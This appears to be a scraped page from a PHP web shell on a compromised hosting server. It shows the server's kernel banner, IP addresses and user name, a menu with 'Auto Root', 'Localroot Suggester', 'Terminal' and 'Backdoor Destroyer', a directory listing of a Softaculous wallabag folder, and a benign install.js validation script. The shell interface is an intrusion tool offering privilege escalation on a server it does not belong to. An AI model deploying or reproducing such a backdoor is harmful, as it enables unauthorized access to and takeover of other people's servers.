Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.217.55
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wallabag /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-10-21 18:08
php53
[ DIR ]
drwxr-xr-x
2025-10-21 18:08
php56
[ DIR ]
drwxr-xr-x
2025-10-21 18:08
php71
[ DIR ]
drwxr-xr-x
2025-10-21 18:08
php81
[ DIR ]
drwxr-xr-x
2025-10-21 18:08
php82
[ DIR ]
drwxr-xr-x
2025-10-21 18:08
.htaccess
87
B
-rw-r--r--
2021-12-23 06:54
NOTES.txt
2.21
KB
-rw-r--r--
2025-10-08 07:01
changelog.txt
3.18
KB
-rw-r--r--
2025-10-08 07:01
clone.php
6.46
KB
-rw-r--r--
2025-10-08 08:02
edit.php
5.99
KB
-rw-r--r--
2025-10-08 08:02
edit.xml
433
B
-rw-r--r--
2021-12-23 06:54
extend.php
2.04
KB
-rw-r--r--
2025-10-08 08:02
fileindex.php
483
B
-rw-r--r--
2023-09-11 02:19
import.php
3.91
KB
-rw-r--r--
2025-10-08 08:02
info.xml
4.77
KB
-rw-r--r--
2025-10-08 07:01
install.js
924
B
-rw-r--r--
2021-12-23 06:54
install.php
8.73
KB
-rw-r--r--
2025-10-08 08:02
install.xml
1.62
KB
-rw-r--r--
2022-04-19 03:48
md5
2.52
KB
-rw-r--r--
2025-10-08 08:02
parameters.yml
1.04
KB
-rw-r--r--
2023-09-11 02:19
soft_delete.php
3.03
KB
-rw-r--r--
2021-12-23 06:54
upgrade.php
24.13
KB
-rw-r--r--
2025-10-08 08:02
upgrade.xml
265
B
-rw-r--r--
2023-10-06 01:43
wallabag.sql
20.51
KB
-rw-r--r--
2025-10-08 07:01
wallabag.zip
65.72
MB
-rw-r--r--
2025-10-08 07:01
Save
Rename
////////////////////////////////////////////////////////////// // install.js // Checks the installation form of the software being // installed by SOFTACULOUS // NOTE: 1) Only formcheck() function will be called. // 2) A software Vendor can use the same name for every // field to be checked as in install.xml . It can be // called using $('fieldname').value or any property // 3) Must Return true or false // ---------------------------------------------------------- // Please Read the Terms of use at http://www.softaculous.com // ---------------------------------------------------------- // (c)Softaculous Inc. ////////////////////////////////////////////////////////////// function formcheck(){ //Check the Admin Email if(window.check_punycode){ if(!check_punycode($('admin_email').value)){ alert('{{err_ademail}}'); return false; } return true; } return true; };